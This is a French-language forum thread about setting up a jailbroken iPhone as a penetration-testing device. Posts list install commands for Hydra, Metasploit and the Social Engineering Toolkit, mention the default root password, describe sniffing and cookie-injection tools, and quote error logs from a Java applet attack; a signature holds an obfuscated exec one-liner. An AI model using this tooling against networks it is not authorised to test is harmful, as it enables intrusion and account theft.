Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-01-2012 10:05:56

bad-shadow
Nouveau membre
Inscription : 09-03-2011
Messages : 7

Pentest device with iPhone

Salut à tous,

Cela fait un long moment que je ne suis pas passé.

Ayant vu cet article récemment, j’ai décidé de partager un article que j'avais fait pour mon iPhone 3GS à l'époque.


J’ai passer quelques dizaine minutes pour intégrer quelques petites applications dédiées au  pentest sur mon iphone.


Voici la liste des applications qui seront installées :

OpenSSH : Prise de commande à distance
Subversion (SVN) : système de gestion de versions
Nano : Editeur de text
Wget :  gestionnaire de téléchargement
Python : Language et interpréteur
Ruby : Comme Python
Ncftp : client FTP
Netcat : Outils réseaux
Ngrep : outil de surveillance de paquets réseau.
Rdesktop : client pour le service RDP
Stunnel : crypteur pour les connexions TCP (utilise SSL)
Tcpdump : analyseur de paquet
Ping : Le fameux ping
THChydra : Un brute forceur multiprotocole
MetaSploit : fournisseur d’informations sur des vulnérabilités et aide à la pénétration de SI

Avant tout , il faut installer openSSH depuis Cydia.

Ensuite se connecter sur son iPhone en SSH en wifi (depuis putty pour windows ou un terminal sur les systèmes *nix):

ssh ip_du_device -l root

Pour infos , le mot de passe de base est alpine mais je conseille fortement de le changer.

Ensuite , une fois logguer , aller sur :

cd /private/var/

puis creer un dossier ou nous téléchargerons ce dont on a besoin.

mkdir dossiertemp
cd dossiertump
apt-get install subversion nano  wget python ncftp netcat ngrep rdesktop stunnel tcpdump ping com.modmyi.thchydra
apt-get clean

wget http://www.ijachouf.com/iphone/ruby_1.8 … os-arm.deb
wget http://plugin.name/apt.iwatcher.net/deb … os-arm.deb
dpkg –install *.deb

wget http://www.metasploit.com/releases/fram … .1.tar.bz2
tar jxvf framework-3.4.1.tar.bz2
cd msf3
svn update

On supprime les packages et fichiers téléchargés
rm *.deb
rm *.bz2

Voila. je mettrai a jour au fur et a mesure je pense  .

Enjoy

N.B:  Tout ceci a été installer sur un iPhone 3GS mais devrait fonctionner sur iPod Touch et iPhone 4

P.S : remerciement au blog offensive security pour l’installation de metasploit

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 20-01-2012 12:52:54

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest device with iPhone

bad-shadow a écrit :

Avant tout , il faut installer openSSH depuis Cydia.

Et peut etre un terminal aussi, sinon ca risque d'etre difficile de lancer tous ces tools! wink
D'autant plus, qu' une fois que tu as le terminal, pas besoin de se connecter en SSH, tu lances toutes les commandes que tu as énuméré depuis celui-ci
Ah! derniere chose, précise quand meme que l'appareil doit etre jailbreaké (meme si pour toi c'est une évidence) car tout le monde n'est pas sensé le savoir


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#3 20-01-2012 17:51:59

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Pentest device with iPhone

bad-shadow a écrit :

Avant tout , il faut installer openSSH depuis Cydia.

Ca veut donc forcément dire sur un Iphone jailbreaké smile Et je pense que l'intéret principal du ssh est de pouvoir utiliser un vrai clavier plutot que de se taper toutes les lignes de commande sur le minuscule tactile, non?

Merci à toi bad-shadow, je suis sur que ça va intéresser pas mal de monde, le pentest sur smartphone rencontre de plus en plus de succès et les possesseurs d'Iphone sont très nombreux wink

Hors Ligne

#4 20-01-2012 18:44:23

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Pentest device with iPhone

En complément de Metasploit, on peut aussi installer S.E.T (Social Engineering Toolkit)

cd /private/var/
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET/
./set

$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#5 23-01-2012 11:35:51

bad-shadow
Nouveau membre
Inscription : 09-03-2011
Messages : 7

Re : Pentest device with iPhone

Bonjour,

effectivement j'ai penser lancer tout ça depuis un terminal sur le mobile , c'est la première chose que j'avais faite mais lorsque j'ai écrit la procédure, je l'ai fait alors que j'avais déjà le terminal installé donc j'ai oublier de le préciser.

Merci pour la correction smile

Hors Ligne

#6 23-01-2012 11:37:04

bad-shadow
Nouveau membre
Inscription : 09-03-2011
Messages : 7

Re : Pentest device with iPhone

konik a écrit :

En complément de Metasploit, on peut aussi installer S.E.T (Social Engineering Toolkit)

cd /private/var/
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET/
./set

effectivement, je l'avais également installé mais je ne l'avait pas mis dans la procédure lors de son écriture car je ne l'utilisait pas vraiment à l'époque mais il est intéressant de l'ajouter smile

Hors Ligne

#7 28-03-2012 10:30:59

sanguinius
N00b
Inscription : 28-12-2011
Messages : 4

Re : Pentest device with iPhone

Salut, déjà merci pour les petites infos sur le pentest iphone je pensais que c'était carrément impossible !
sinon je voudrais rajouter mon grain de sel en disant qu'en fait tu peux presque tout prendre depuis cydia en ajoutant ces sources là:

http://cydia.myrepospace.com/chattaboxa

http://cydia.myrepospace.com/boo

http://cydia.theworm.tw/

et ensuite récupérer plein de petits logiciels qui font des regroupements, j'ai notamment découvert iPwN qui utilise THC hydra et d'autres trucs mais aussi la pentbox portée sur iphone (attention pour que ça marche faut avoir ruby en 1.8.6 parce que le 1.9.x foire)
dans ces outils on a du crackage de password, générateur de dico, du scanner de ports tcp, du dos tcp, un outil de fuzzing (je sais pas ce que c'est) et bien d'autres choses, un truc qui s'appelle notamment Pirni et Derv dans iPwN et qui m'a simplement coupé le souffle, ça écoute le traffic et fais de l'injection de cookie, alors que j'étais connecté au même réseau wifi que mon ordi je pouvais voir quels requêtes je faisais etc..., pour un iphone c'est costaud !
allez a+

Hors Ligne

#8 28-03-2012 13:57:30

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Pentest device with iPhone

Metasploit sur iOS ?
Crackage de pwd sur iPhone ?
Hydra sur iPhone ?

Est-ceque tout fonctionne bien ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#9 28-03-2012 14:50:50

sanguinius
N00b
Inscription : 28-12-2011
Messages : 4

Re : Pentest device with iPhone

Yep alors Hydra ba ça marche plutôt, fin j'ai jamais utiliser avant, c'est ça mon pb smile

sinon metasploit y a des vidéos sur youtube qui démontre que ça marche bien, moi j'y suis presque j'ai juste un problème quand je lance SET, je fais mon java applet attack etc etc j'ai juste après avoir choisi le payload il me met des erreurs:

Enter your choice (enter for default): 15
[-] Enter the PORT of the listener (enter for default):
/var/pentest/exploits/msf3/lib/msf/core/module.rb:1030:in `inject': no block given (LocalJumpError)
        from /var/pentest/exploits/msf3/lib/rex/text.rb:1296:in `each'
        from /var/pentest/exploits/msf3/lib/rex/text.rb:1296:in `inject'
        from /var/pentest/exploits/msf3/lib/rex/text.rb:1296:in `checksum8'
        from /var/pentest/exploits/msf3/lib/msf/core/handler/reverse_http.rb:72:in `generate_uri_checksum'
        from /var/pentest/exploits/msf3/lib/msf/core/handler/reverse_http.rb:71:in `each'
        from /var/pentest/exploits/msf3/lib/msf/core/handler/reverse_http.rb:71:in `generate_uri_checksum'
        from /var/pentest/exploits/msf3/lib/msf/core/handler/reverse_http.rb:69:in `times'
        from /var/pentest/exploits/msf3/lib/msf/core/handler/reverse_http.rb:69:in `generate_uri_checksum'
         ... 11 levels...
        from /var/pentest/exploits/msf3/lib/msf/core/module_manager.rb:651:in `add_module_path'
        from /var/pentest/exploits/msf3/lib/msf/base/simple/framework.rb:112:in `simplify'
        from /var/pentest/exploits/msf3/lib/msf/base/simple/framework.rb:71:in `create'
        from /var/pentest/exploits/msf3/msfpayload:83

donc bon vous me direz peut -être que c'est pas grave mais ensuite

[-] x86/alpha_upper failed: undefined method `each_char' for "":String
[-] No encoders succeeded.
[] x86/shikata_ga_nai succeeded with size 27 (iteration=1)

y a un payload qui marche pas

puis

[] Launching MSF Listener...                                                                                                                                     
[] This may take a few to load MSF...                                                                                                                           
/private/var/pentest/exploits/msf3/modules/auxiliary/bnat/bnat_router.rb:60: warning: parenthesize argument(s) for future version
/private/var/pentest/exploits/msf3/modules/auxiliary/bnat/bnat_router.rb:61: warning: parenthesize argument(s) for future version
/private/var/pentest/exploits/msf3/modules/auxiliary/bnat/bnat_router.rb:134: warning: parenthesize argument(s) for future version
/var/pentest/exploits/msf3/lib/msf/core/module.rb:1030:in `inject': no block given (LocalJumpError)
        from /var/pentest/exploits/msf3/lib/rex/text.rb:1296:in `each'
        from /var/pentest/exploits/msf3/lib/rex/text.rb:1296:in `inject'
        from /var/pentest/exploits/msf3/lib/rex/text.rb:1296:in `checksum8'
        from /var/pentest/exploits/msf3/lib/msf/core/handler/reverse_http.rb:72:in `generate_uri_checksum'
        from /var/pentest/exploits/msf3/lib/msf/core/handler/reverse_http.rb:71:in `each'
        from /var/pentest/exploits/msf3/lib/msf/core/handler/reverse_http.rb:71:in `generate_uri_checksum'
        from /var/pentest/exploits/msf3/lib/msf/core/handler/reverse_http.rb:69:in `times'
        from /var/pentest/exploits/msf3/lib/msf/core/handler/reverse_http.rb:69:in `generate_uri_checksum'
         ... 13 levels...
        from /var/pentest/exploits/msf3/lib/msf/base/simple/framework.rb:71:in `create'
        from /var/pentest/exploits/msf3/lib/msf/ui/console/driver.rb:81:in `initialize'
        from /var/pentest/exploits/msf3/msfconsole:134:in `new'
        from /var/pentest/exploits/msf3/msfconsole:134

et ensuite il revient au menu, donc si quelqu'un aurait un indice ? j'ai réinstallé metasploit plusieurs fois parce que je pensais que ça venait de là, j'ai aussi réinstallé ruby, parce que je vois que c'est tout des fichiers ruby qui sont en galère, mais par contre pour SET le lien que tu donnes plus haut est mort et donc je l'ai récupérer sur cydia sur les sources que j'ai mises plus haut je me demande si ça peut venir de là ! Sinon j'essayerais un vrai tuto complet pour noob pour Metasploit parce que il faut aussi avoir lighttpd pour le serveur bref merci si vous pouvez m'aider a+ !
(je me suis demandé si c'était pas un pb de dossier ? est ce que là où tout ça est placé dans l'iphone change qq chose ? )

Dernière modification par sanguinius (28-03-2012 14:52:07)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
chaine youtube pentest par s1lv3rf0x
22 2540 20-11-2016 15:04:34 par richie
Épinglée :
21 14678 20-11-2016 12:53:07 par richie
Liste de tools pentest android par ✞θ!ก∃℧┌
9 2219 28-10-2016 01:16:42 par oursencolere
1 381 18-09-2016 12:54:01 par kcdtv
PC pour pentest par ledawa
7 2849 23-02-2016 16:36:35 par LL99

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]